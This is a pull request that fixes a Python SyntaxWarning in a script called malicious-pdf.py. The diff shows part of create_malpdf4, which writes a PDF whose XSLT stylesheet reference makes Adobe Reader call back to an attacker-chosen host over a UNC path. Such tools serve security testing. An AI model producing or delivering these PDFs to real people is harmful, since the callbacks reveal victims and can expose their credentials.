### PR TITLE
Fix SyntaxWarning by using raw strings in create_malpdf4 function

### DIFF
--- a/malicious-pdf.py
+++ b/malicious-pdf.py
@@ -504,12 +504,12 @@ trailer <<
 # From: https://insert-script.blogspot.com/2019/01/adobe-reader-pdf-callback-via-xslt.html
 def create_malpdf4(filename, host):
     with open(filename, "w") as file:
-        file.write('''%PDF-
+        file.write(r'''%PDF-
 
 1 0 obj <<>>
 stream
 <?xml version="1.0" ?>
-<?xml-stylesheet href="\\\\''' + host + '''\whatever.xslt" type="text/xsl" ?>
+<?xml-stylesheet href="\\\\''' + host + r'''\whatever.xslt" type="text/xsl" ?>
 endstream
 endobj
 trailer <<


### PR DESCRIPTION
**Overview**
This pull request resolves a SyntaxWarning: invalid escape sequence '\w' that occurs when running the malicious-pdf.py script. The warning arises due to unescaped backslashes in the XML stylesheet URL in the create_malpdf4 function. The issue has been fixed by marking the string as a raw string using the r'' prefix.

**Changes Made**
- Updated the create_malpdf4 function to use raw string literals (r'') for better handling of backslashes in file paths and XML attributes.

- This change ensures that the backslashes (\\) are interpreted literally without raising warnings during execution.